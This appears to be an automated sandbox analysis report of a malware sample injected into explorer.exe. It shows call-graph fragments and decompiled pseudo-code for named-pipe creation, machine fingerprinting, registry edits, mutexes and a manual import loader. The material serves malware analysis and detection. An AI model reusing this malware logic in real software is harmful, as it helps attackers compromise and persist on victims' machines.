10804->10795 10805->10518 10806->10505 10808 
8b867 CharUpperBuffW 10807->10808 10808->10673 10810 82bc0 10809->10810 10811 8109a RtlAllocateHeap 10810->10811 10824 82c5c 10810->10824 10812 82bd3 10811->10812 10813 892e5 2 API calls 10812->10813 10814 82be5 10813->10814 10815 885d5 2 API calls 10814->10815 10816 82bf0 10815->10816 10817 8109a RtlAllocateHeap 10816->10817 10818 82bfa 10817->10818 10972 8bf37 RegOpenKeyExW 10818->10972 10821 885d5 2 API calls 10822 82c16 10821->10822 10823 8861a 2 API calls 10822->10823 10823->10824 10824->10680 10826 8b698 10825->10826 10827 895c7 RtlAllocateHeap 10826->10827 10828 8b6a2 10827->10828 10829 9242d _ftol2_sse 10828->10829 10832 8b6b7 10829->10832 10830 8b6ed 10831 885c2 2 API calls 10830->10831 10833 84a9d 10831->10833 10832->10830 10834 9242d _ftol2_sse 10832->10834 10835 849c7 10833->10835 10834->10832 10836 89256 2 API calls 10835->10836 10837 849d2 10836->10837 10838 895e1 RtlAllocateHeap 10837->10838 10839 849e1 10838->10839 10973 8bf6c RegQueryValueExW 10972->10973 10975 82c08 10972->10975 10974 8bf8c 10973->10974 10973->10975 10982 88604 RtlAllocateHeap 10974->10982 10975->10821 10977 8bf94 10977->10975 10978 8bf9e RegQueryValueExW 10977->10978 10979 8bfba 10978->10979 10980 8bfdd RegCloseKey 10978->10980 10980->10975 10982->10977 11017->10744 11019 84928 11018->11019 11020 84995 Sleep 11019->11020 11021 84a0b 58 API calls 11019->11021 11020->10744 11023 84948 11021->11023 11022 84986 11036 847ca 11022->11036 11023->11020 11023->11022 11026 8ad44 11023->11026 11027 8ad65 11026->11027 11032 8ad5e 11026->11032 11028 8ad79 11027->11028 11029 8ad71 GetLastError 11027->11029 11030 8b998 6 API calls 11028->11030 11029->11032 11031 8ad8b 11030->11031 11031->11032 11033 8adea 11031->11033 11034 8ada2 memset 11031->11034 11032->11023 11035 8861a 2 API calls 11033->11035 11034->11033 11035->11032 11037 860df 4 API calls 11036->11037 11038 847ef 11037->11038 11039 847fb 11038->11039 11040 8109a RtlAllocateHeap 11038->11040 11039->11020 11041 8481a 11040->11041 11042 
892e5 2 API calls 11041->11042 11043 8482c 11042->11043 11044 885d5 2 API calls 11043->11044 11078 8f7fe 11077->11078 11079 8f883 11077->11079 11080 8109a RtlAllocateHeap 11078->11080 11081 8109a RtlAllocateHeap 11079->11081 11113->10787 11114->10793 11144 88604 RtlAllocateHeap 11115->11144 11117 861ef 11118 86360 11117->11118 11145 88604 RtlAllocateHeap 11117->11145 11118->10229 11120 86209 11120->11118 11121 86217 RegOpenKeyExW 11120->11121 11122 8626f 11121->11122 11129 8623a 11121->11129 11123 86339 RegCloseKey 11122->11123 11124 86344 11122->11124 11123->11124 11125 8861a 2 API calls 11124->11125 11126 86352 11125->11126 11127 8861a 2 API calls 11126->11127 11127->11118 11128 8628d memset memset 11128->11129 11129->11122 11129->11128 11130 86315 11129->11130 11131 8b1b1 13 API calls 11130->11131 11131->11129 11133 89f95 7 API calls 11132->11133 11134 89e87 11133->11134 11135 89e9e 11134->11135 11136 8861a 2 API calls 11134->11136 11135->10244 11137 88604 RtlAllocateHeap 11135->11137 11136->11135 11137->10234 11139 8a245 11138->11139 11140 89b0e RtlAllocateHeap 11139->11140 11142 8a275 11140->11142 11141 8a2da 11141->10241 11142->11141 11143 8861a 2 API calls 11142->11143 11143->11141 11144->11117 11145->11120 11147 89e66 7 API calls 11146->11147 11148 85642 11147->11148 11149 8980c GetSystemTimeAsFileTime 11148->11149 11184 856c0 11148->11184 11150 8565b 11149->11150 11151 89f06 6 API calls 11150->11151 11152 8566f 11151->11152 11153 89f06 6 API calls 11152->11153 11154 85685 11153->11154 11185 8e4c1 11154->11185 11157 8a86d 5 API calls 11158 856a4 11157->11158 11159 856c8 CreateMutexA 11158->11159 11158->11184 11160 856df 11159->11160 11163 856e9 11159->11163 11192 88604 RtlAllocateHeap 11160->11192 11193 8153b CreateMutexA 11163->11193 11166 85715 11220 83017 11166->11220 11184->10022 11186 8e1bc 7 API calls 11185->11186 11187 8e4d3 11186->11187 11188 8e1bc 7 API calls 11187->11188 11189 8e4ec 11188->11189 11287 8e450 11189->11287 11191 8568d 11191->11157 

                  Executed Functions

                  C-Code - Quality: 79%
                  			E000831C2(void* __edx, void* __eflags) {
                  				CHAR* _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				void* _v20;
                  				signed int _t10;
                  				intOrPtr _t11;
                  				intOrPtr _t12;
                  				void* _t16;
                  				intOrPtr _t18;
                  				intOrPtr _t22;
                  				intOrPtr _t28;
                  				void* _t38;
                  				CHAR* _t40;
                  
                  				_t38 = __edx;
                  				_t28 =  *0x9e688; // 0xb0000
                  				_t10 = E0008C292( *((intOrPtr*)(_t28 + 0xac)), __eflags);
                  				_t40 = _t10;
                  				_v8 = _t40;
                  				if(_t40 != 0) {
                  					_t11 = E00088604(0x80000); // executed
                  					 *0x9e724 = _t11;
                  					__eflags = _t11;
                  					if(_t11 != 0) {
                  						_t12 = E0008BD10(); // executed
                  						_v16 = _t12;
                  						__eflags = _t12;
                  						if(_t12 != 0) {
                  							_push(0xc);
                  							_pop(0);
                  							_v12 = 1;
                  						}
                  						_v20 = 0;
                  						__eflags = 0;
                  						asm("sbb eax, eax");
                  						_t16 = CreateNamedPipeA(_t40, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v20);
                  						 *0x9e674 = _t16;
                  						__eflags = _t16 - 0xffffffff;
                  						if(_t16 != 0xffffffff) {
                  							E0008BC7A( &_v20, _t38); // executed
                  							_t18 = E000898EE(E000832A1, 0, __eflags, 0, 0); // executed
                  							__eflags = _t18;
                  							if(_t18 != 0) {
                  								goto L12;
                  							}
                  							_t22 =  *0x9e684; // 0xe7f8f0
                  							 *((intOrPtr*)(_t22 + 0x30))( *0x9e674);
                  							_push(0xfffffffd);
                  							goto L11;
                  						} else {
                  							 *0x9e674 = 0;
                  							_push(0xfffffffe);
                  							L11:
                  							_pop(0);
                  							L12:
                  							E0008861A( &_v8, 0xffffffff);
                  							return 0;
                  						}
                  					}
                  					_push(0xfffffff5);
                  					goto L11;
                  				}
                  				return _t10 | 0xffffffff;
                  			}
















                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00085A61(void* __eflags) {
                  				intOrPtr _t2;
                  				void* _t6;
                  				void* _t7;
                  
                  				_t2 =  *0x9e684; // 0xe7f8f0
                  				 *((intOrPtr*)(_t2 + 0x108))(1, E00085A06);
                  				E00085631(_t6, _t7); // executed
                  				return 0;
                  			}






                  APIs
                  • RtlAddVectoredExceptionHandler.NTDLL(00000001,00085A06,00085CE8), ref: 00085A6D
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: ExceptionHandlerVectored
                  • String ID:
                  • API String ID: 3310709589-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 79%
                  			E00084A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
                  				char _v516;
                  				void _v1044;
                  				char _v1076;
                  				signed int _v1080;
                  				signed int _v1096;
                  				WCHAR* _v1100;
                  				intOrPtr _v1104;
                  				signed int _v1108;
                  				intOrPtr _v1112;
                  				intOrPtr _v1116;
                  				char _v1144;
                  				char _v1148;
                  				void* __esi;
                  				intOrPtr _t66;
                  				intOrPtr _t73;
                  				signed int _t75;
                  				intOrPtr _t76;
                  				signed int _t80;
                  				signed int _t81;
                  				WCHAR* _t87;
                  				void* _t89;
                  				signed int _t90;
                  				signed int _t91;
                  				signed int _t93;
                  				signed int _t94;
                  				WCHAR* _t96;
                  				intOrPtr _t106;
                  				intOrPtr _t107;
                  				void* _t108;
                  				intOrPtr _t109;
                  				signed char _t116;
                  				WCHAR* _t118;
                  				void* _t122;
                  				signed int _t123;
                  				intOrPtr _t125;
                  				void* _t128;
                  				void* _t129;
                  				WCHAR* _t130;
                  				void* _t134;
                  				void* _t141;
                  				void* _t143;
                  				WCHAR* _t145;
                  				signed int _t153;
                  				void* _t154;
                  				void* _t178;
                  				signed int _t180;
                  				void* _t181;
                  				void* _t183;
                  				void* _t187;
                  				signed int _t188;
                  				WCHAR* _t190;
                  				signed int _t191;
                  				signed int _t192;
                  				intOrPtr* _t194;
                  				signed int _t196;
                  				void* _t199;
                  				void* _t200;
                  				void* _t201;
                  				void* _t202;
                  				intOrPtr* _t203;
                  				void* _t208;
                  
                  				_t208 = __fp0;
                  				_push(_t191);
                  				_t128 = __edx;
                  				_t187 = __ecx;
                  				_t192 = _t191 | 0xffffffff;
                  				memset( &_v1044, 0, 0x20c);
                  				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
                  				_v1108 = 1;
                  				if(_t187 != 0) {
                  					_t123 =  *0x9e688; // 0xb0000
                  					_t125 =  *0x9e68c; // 0xe7fab8
                  					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
                  				}
                  				if(E0008BB8D(_t187) != 0) {
                  					L4:
                  					_t134 = _t128; // executed
                  					_t66 = E0008B7A8(_t134,  &_v516); // executed
                  					_push(_t134);
                  					_v1104 = _t66;
                  					E0008B67D(_t66,  &_v1076, _t206, _t208);
                  					_t129 = E000849C7( &_v1076,  &_v1076, _t206);
                  					_t141 = E0008D400( &_v1076, E0008C379( &_v1076), 0);
                  					E0008B88A(_t141,  &_v1100, _t208);
                  					_t175 =  &_v1076;
                  					_t73 = E00082C8F(_t187,  &_v1076, _t206, _t208); // executed
                  					_v1112 = _t73;
                  					_t143 = _t141;
                  					if(_t73 != 0) {
                  						_push(0);
                  						_push(_t129);
                  						_push("\\");
                  						_t130 = E000892E5(_t73);
                  						_t200 = _t199 + 0x10;
                  						_t75 =  *0x9e688; // 0xb0000
                  						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
                  						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
                  							L12:
                  							__eflags = _v1108;
                  							if(__eflags != 0) {
                  								_t76 = E000891E3(_v1112);
                  								_t145 = _t130;
                  								 *0x9e740 = _t76;
                  								 *0x9e738 = E000891E3(_t145);
                  								L17:
                  								_push(_t145);
                  								_t80 = E00089B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100); // executed
                  								_t188 = _t80;
                  								_t201 = _t200 + 0x10;
                  								__eflags = _t188;
                  								if(_t188 == 0) {
                  									goto L41;
                  								}
                  								_push(0x9b9ca);
                  								E00089F48(0xe); // executed
                  								E00089F6C(_t188, _t208, _t130); // executed
                  								_t194 = _a4;
                  								_v1096 = _v1096 & 0x00000000;
                  								_push(2);
                  								_v1100 =  *_t194;
                  								_push(8);
                  								_push( &_v1100);
                  								_t178 = 0xb; // executed
                  								E0008A0AB(_t188, _t178, _t208); // executed
                  								_t179 =  *(_t194 + 0x10);
                  								_t202 = _t201 + 0xc;
                  								__eflags =  *(_t194 + 0x10);
                  								if( *(_t194 + 0x10) != 0) {
                  									E0008A3ED(_t188, _t179, _t208);
                  								}
                  								_t180 =  *(_t194 + 0xc);
                  								__eflags = _t180;
                  								if(_t180 != 0) {
                  									E0008A3ED(_t188, _t180, _t208); // executed
                  								}
                  								_t87 = E0008980C(0);
                  								_push(2);
                  								_v1100 = _t87;
                  								_t153 = _t188;
                  								_push(8);
                  								_v1096 = _t180;
                  								_push( &_v1100);
                  								_t181 = 2; // executed
                  								_t89 = E0008A0AB(_t153, _t181, _t208); // executed
                  								_t203 = _t202 + 0xc;
                  								__eflags = _v1108;
                  								if(_v1108 == 0) {
                  									_t153 =  *0x9e688; // 0xb0000
                  									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
                  									if(__eflags != 0) {
                  										_t90 = E0008FC1F(_t89, _t181, _t208, 0, _t130, 0);
                  										_t203 = _t203 + 0xc;
                  										goto L26;
                  									}
                  									_t153 = _t153 + 0x228;
                  									goto L25;
                  								} else {
                  									_t91 =  *0x9e688; // 0xb0000
                  									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
                  									if(__eflags != 0) {
                  										L32:
                  										__eflags =  *(_t91 + 0x1898) & 0x00000082;
                  										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
                  											_t183 = 0x64;
                  											E0008E23E(_t183);
                  										}
                  										E000852C0( &_v1076, _t208);
                  										_t190 = _a8;
                  										_t154 = _t153;
                  										__eflags = _t190;
                  										if(_t190 != 0) {
                  											_t94 =  *0x9e688; // 0xb0000
                  											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
                  											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
                  												lstrcpyW(_t190, _t130);
                  											} else {
                  												_t96 = E0008109A(_t154, 0x228);
                  												_v1100 = _t96;
                  												lstrcpyW(_t190, _t96);
                  												E000885D5( &_v1100);
                  												 *_t203 = "\"";
                  												lstrcatW(_t190, ??);
                  												lstrcatW(_t190, _t130);
                  												lstrcatW(_t190, "\"");
                  											}
                  										}
                  										_t93 = _a12;
                  										__eflags = _t93;
                  										if(_t93 != 0) {
                  											 *_t93 = _v1104;
                  										}
                  										_t192 = 0;
                  										__eflags = 0;
                  										goto L41;
                  									}
                  									_t51 = _t91 + 0x228; // 0xb0228
                  									_t153 = _t51;
                  									L25:
                  									_t90 = E0008553F(_t153, _t130, __eflags);
                  									L26:
                  									__eflags = _t90;
                  									if(_t90 >= 0) {
                  										_t91 =  *0x9e688; // 0xb0000
                  										goto L32;
                  									}
                  									_push(0xfffffffd);
                  									L6:
                  									_pop(_t192);
                  									goto L41;
                  								}
                  							}
                  							_t106 = E0008C292(_v1104, __eflags);
                  							_v1112 = _t106;
                  							_t107 =  *0x9e684; // 0xe7f8f0
                  							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
                  							__eflags = _t108 - _t192;
                  							if(_t108 != _t192) {
                  								_t109 =  *0x9e684; // 0xe7f8f0
                  								 *((intOrPtr*)(_t109 + 0x30))();
                  								E0008861A( &_v1148, _t192);
                  								_t145 = _t108;
                  								goto L17;
                  							}
                  							E0008861A( &_v1144, _t192);
                  							_t81 = 1;
                  							goto L42;
                  						}
                  						_t116 =  *(_t75 + 0x1898);
                  						__eflags = _t116 & 0x00000004;
                  						if((_t116 & 0x00000004) == 0) {
                  							__eflags = _t116;
                  							if(_t116 != 0) {
                  								goto L12;
                  							}
                  							L11:
                  							E0008E286(_v1112, _t175);
                  							goto L12;
                  						}
                  						_v1080 = _v1080 & 0x00000000;
                  						_t118 = E000895E1(_t143, 0x879);
                  						_v1100 = _t118;
                  						_t175 = _t118;
                  						E0008BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
                  						E000885D5( &_v1100);
                  						_t200 = _t200 + 0x14;
                  						goto L11;
                  					}
                  					_push(0xfffffffe);
                  					goto L6;
                  				} else {
                  					_t122 = E00082BA4( &_v1044, _t192, 0x105); // executed
                  					_t206 = _t122;
                  					if(_t122 == 0) {
                  						L41:
                  						_t81 = _t192;
                  						L42:
                  						return _t81;
                  					}
                  					goto L4;
                  				}
                  			}
































































                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: lstrcat$lstrcpy$memset
                  • String ID:
                  • API String ID: 1985475764-0
                  • Opcode ID: 2356931df70684d658a479f44f219f8e37a5c690f67de42f2680c086677cbb3c
                  • Instruction ID: dec47ca1d8cbe9d9e50b353cb195f6a6744e81453b5205875f33d8479ea457cb
                  • Opcode Fuzzy Hash: 2356931df70684d658a479f44f219f8e37a5c690f67de42f2680c086677cbb3c
                  • Instruction Fuzzy Hash: FC919E71604302AFE754FB24DC86FBA73E9BB84720F14452EF5958B292EB74DD048B92
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 94%
                  			E0008B7A8(WCHAR* __ecx, void* __edx) {
                  				long _v8;
                  				long _v12;
                  				WCHAR* _v16;
                  				short _v528;
                  				short _v1040;
                  				short _v1552;
                  				WCHAR* _t27;
                  				signed int _t29;
                  				void* _t33;
                  				long _t38;
                  				WCHAR* _t43;
                  				WCHAR* _t56;
                  
                  				_t44 = __ecx;
                  				_v8 = _v8 & 0x00000000;
                  				_t43 = __edx;
                  				_t56 = __ecx;
                  				memset(__edx, 0, 0x100);
                  				_v12 = 0x100;
                  				GetComputerNameW( &_v528,  &_v12);
                  				lstrcpynW(_t43,  &_v528, 0x100);
                  				_t27 = E000895E1(_t44, 0xa88);
                  				_v16 = _t27;
                  				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                  				asm("sbb eax, eax");
                  				_v8 = _v8 &  ~_t29;
                  				E000885D5( &_v16);
                  				_t33 = E0008C392(_t43);
                  				E00089640( &(_t43[E0008C392(_t43)]), 0x100 - _t33, L"%u", _v8);
                  				lstrcatW(_t43, _t56);
                  				_t38 = E0008C392(_t43);
                  				_v12 = _t38;
                  				CharUpperBuffW(_t43, _t38);
                  				return E0008D400(_t43, E0008C392(_t43) + _t40, 0);
                  			}

                  APIs
                  • memset.MSVCRT ref: 0008B7C5
                  • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 0008B7E0
                  • lstrcpynW.KERNEL32(?,?,00000100), ref: 0008B7EF
                  • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0008B821
                    • Part of subcall function 00089640: _vsnwprintf.MSVCRT ref: 0008965D
                  • lstrcatW.KERNEL32 ref: 0008B85A
                  • CharUpperBuffW.USER32(?,00000000), ref: 0008B86C
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
                  • String ID:
                  • API String ID: 3410906232-0
                  • Opcode ID: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
                  • Instruction ID: 8115248732dee6e15747b0cfab76d271734f3ac179cb7c14a2a6e9e989f043a1
                  • Opcode Fuzzy Hash: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
                  • Instruction Fuzzy Hash: F82156B2A00214BFE714BBA4DC4AFEE77BCFB85310F108566B505E6182EE755F088B60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 123 861b4-861f9 memset call 88604 126 861ff-86211 call 88604 123->126 127 86363-86369 123->127 126->127 130 86217-86234 RegOpenKeyExW 126->130 131 8623a-8626d 130->131 132 86333-86337 130->132 138 8627f-86284 131->138 139 8626f-8627a 131->139 133 86339-86341 RegCloseKey 132->133 134 86344-86360 call 8861a * 2 132->134 133->134 134->127 138->132 141 8628a 138->141 139->132 144 8628d-862dc memset * 2 141->144 146 862de-862ee 144->146 147 86326-8632d 144->147 149 862f0-86304 146->149 150 86323 146->150 147->132 147->144 149->150 152 86306-86313 call 8c392 149->152 150->147 155 8631c-8631e call 8b1b1 152->155 156 86315-86317 152->156 155->150 156->155
                  C-Code - Quality: 80%
                  			E000861B4(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
                  				void* _v8;
                  				int _v12;
                  				int _v16;
                  				int _v20;
                  				char _v24;
                  				char _v28;
                  				void* _v32;
                  				void* _v36;
                  				char _v40;
                  				char _v44;
                  				char _v48;
                  				char _v56;
                  				void _v576;
                  				void* _t53;
                  				intOrPtr _t72;
                  				intOrPtr _t80;
                  				intOrPtr _t81;
                  				intOrPtr _t82;
                  				signed int _t85;
                  				intOrPtr _t87;
                  				int _t89;
                  				intOrPtr _t90;
                  				intOrPtr _t92;
                  				void* _t96;
                  				void* _t97;
                  				void* _t98;
                  				void* _t99;
                  				void* _t100;
                  				void* _t108;
                  
                  				_t108 = __fp0;
                  				_t96 = __edx;
                  				_t89 = 0;
                  				_v8 = 0;
                  				memset( &_v576, 0, 0x208);
                  				_v28 = 0x104;
                  				_v20 = 0x3fff;
                  				_v16 = 0;
                  				_t53 = E00088604(0x3fff); // executed
                  				_t98 = _t53;
                  				_t100 = _t99 + 0x10;
                  				_v32 = _t98;
                  				if(_t98 == 0) {
                  					L18:
                  					return 0;
                  				}
                  				_t97 = E00088604(0x800);
                  				_v36 = _t97;
                  				if(_t97 == 0) {
                  					goto L18;
                  				}
                  				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
                  					L15:
                  					if(_v8 != 0) {
                  						RegCloseKey(_v8);
                  					}
                  					E0008861A( &_v32, 0x3fff);
                  					E0008861A( &_v36, 0x800);
                  					goto L18;
                  				}
                  				_push( &_v56);
                  				_push( &_v40);
                  				_push( &_v44);
                  				_push( &_v48);
                  				_push( &_v24);
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push( &_v28);
                  				_push( &_v576);
                  				_t72 =  *0x9e68c; // 0xe7fab8
                  				_push(_v8);
                  				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
                  					__eflags = _v24;
                  					if(_v24 == 0) {
                  						goto L15;
                  					}
                  					_v12 = 0;
                  					do {
                  						memset(_t97, 0, 0x800);
                  						memset(_t98, 0, 0x3fff);
                  						_t100 = _t100 + 0x18;
                  						_v20 = 0x3fff;
                  						_v16 = 0x800;
                  						 *_t98 = 0;
                  						_t80 =  *0x9e68c; // 0xe7fab8
                  						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
                  						__eflags = _t81;
                  						if(_t81 == 0) {
                  							_t82 =  *0x9e690; // 0xe7fb90
                  							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
                  							__eflags = _t90;
                  							if(_t90 != 0) {
                  								_t92 =  *0x9e68c; // 0xe7fab8
                  								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
                  								__eflags = _a16;
                  								if(_a16 != 0) {
                  									_t85 = E0008C392(_t90);
                  									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
                  									if(__eflags == 0) {
                  										__eflags = 0;
                  										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
                  									}
                  									E0008B1B1(_t90, _t96, __eflags, _t108);
                  								}
                  							}
                  							_t89 = _v12;
                  						}
                  						_t89 = _t89 + 1;
                  						_v12 = _t89;
                  						__eflags = _t89 - _v24;
                  					} while (_t89 < _v24);
                  					goto L15;
                  				}
                  				_t87 =  *0x9e68c; // 0xe7fab8
                  				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
                  				goto L15;
                  			}

                  APIs
                  • memset.MSVCRT ref: 000861D2
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 0008622C
                  • memset.MSVCRT ref: 00086295
                  • memset.MSVCRT ref: 000862A2
                  • RegCloseKey.KERNEL32(00000000,?,?,00000001), ref: 00086341
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: memset$AllocateCloseHeapOpen
                  • String ID:
                  • API String ID: 1886988140-0
                  • Opcode ID: 7d7b54c6bf340862ecc78c690511dbbc996331d6175cd715f89be187fe39641c
                  • Instruction ID: 5df326356aa9df0f49ed8f656d01e6deee27922878838a2d55d254d8868e0780
                  • Opcode Fuzzy Hash: 7d7b54c6bf340862ecc78c690511dbbc996331d6175cd715f89be187fe39641c
                  • Instruction Fuzzy Hash: 6C5128B1A00209AFEB51EF94CC85FEE7BBCBF04340F118069F545A7252DB759E048B60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 94%
                  			E0008CF84(void* __ecx) {
                  				intOrPtr _t11;
                  				long _t12;
                  				intOrPtr _t17;
                  				intOrPtr _t18;
                  				struct _OSVERSIONINFOA* _t29;
                  
                  				_push(__ecx);
                  				_t29 =  *0x9e688; // 0xb0000
                  				GetCurrentProcess();
                  				_t11 = E0008BA05(); // executed
                  				_t1 = _t29 + 0x1644; // 0xb1644
                  				_t25 = _t1;
                  				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
                  				_t12 = GetModuleFileNameW(0, _t1, 0x105);
                  				_t33 = _t12;
                  				if(_t12 != 0) {
                  					_t12 = E00088FBE(_t25, _t33);
                  				}
                  				_t3 = _t29 + 0x228; // 0xb0228
                  				 *(_t29 + 0x1854) = _t12;
                  				 *((intOrPtr*)(_t29 + 0x434)) = E00088FBE(_t3, _t33);
                  				memset(_t29, 0, 0x9c);
                  				_t29->dwOSVersionInfoSize = 0x9c;
                  				GetVersionExA(_t29);
                  				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
                  				_t17 = E0008E3B6(_t3);
                  				_t7 = _t29 + 0x220; // 0xb0220
                  				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
                  				_t18 = E0008E3F1(_t7); // executed
                  				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
                  				return _t18;
                  			}

                  APIs
                  • GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
                  • GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
                  • memset.MSVCRT ref: 0008CFE2
                  • GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
                  • GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CurrentProcess$FileModuleNameVersionmemset
                  • String ID:
                  • API String ID: 3581039275-0
                  • Opcode ID: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
                  • Instruction ID: 1cd3ccc896d32ed381cc1e7efd68f96a46d511454c8c9de3dc1a9453bb6438f5
                  • Opcode Fuzzy Hash: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
                  • Instruction Fuzzy Hash: C4015E70901700ABE720BF70D84AADAB7E5FF85310F04082EF59683292EF746545CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 170 9249b-924a9 171 924ab-924ae 170->171 172 924b3-924f3 GetModuleHandleA call 8e099 170->172 173 92660-92661 171->173 176 924f9-92510 172->176 177 9265e 172->177 178 92513-9251a 176->178 177->173 179 9251c-92525 178->179 180 92527-92537 178->180 179->178 181 9253a-92541 180->181 181->177 182 92547-9255e LoadLibraryA 181->182 183 92568-9256e 182->183 184 92560-92563 182->184 185 9257d-92586 183->185 186 92570-9257b 183->186 184->173 187 92589 185->187 186->187 188 9258d-92593 187->188 189 92599-925b1 188->189 190 92650-92659 188->190 191 925b3-925d2 189->191 192 925d4-92602 189->192 190->181 195 92605-9260b 191->195 192->195 196 92639-9264b 195->196 197 9260d-9261b 195->197 196->188 198 9261d-9262f 197->198 199 92631-92637 197->199 198->196 199->196
                  C-Code - Quality: 50%
                  			E0009249B(signed int __eax, intOrPtr _a4) {
                  				intOrPtr* _v8;
                  				signed int* _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				signed int _v24;
                  				signed int _v28;
                  				intOrPtr _v32;
                  				struct HINSTANCE__* _v36;
                  				intOrPtr _v40;
                  				signed int _v44;
                  				struct HINSTANCE__* _v48;
                  				intOrPtr _v52;
                  				signed int _v56;
                  				intOrPtr _v60;
                  				signed int _v64;
                  				signed int _t109;
                  				signed int _t112;
                  				signed int _t115;
                  				struct HINSTANCE__* _t121;
                  				void* _t163;
                  
                  				_v44 = _v44 & 0x00000000;
                  				if(_a4 != 0) {
                  					_v48 = GetModuleHandleA("kernel32.dll");
                  					_v40 = E0008E099(_v48, "GetProcAddress");
                  					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                  					_v32 = _v52;
                  					_t109 = 8;
                  					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                  						L24:
                  						return 0;
                  					}
                  					_v56 = 0x80000000;
                  					_t112 = 8;
                  					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                  					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                  						_v8 = _v8 + 0x14;
                  					}
                  					_t115 = 8;
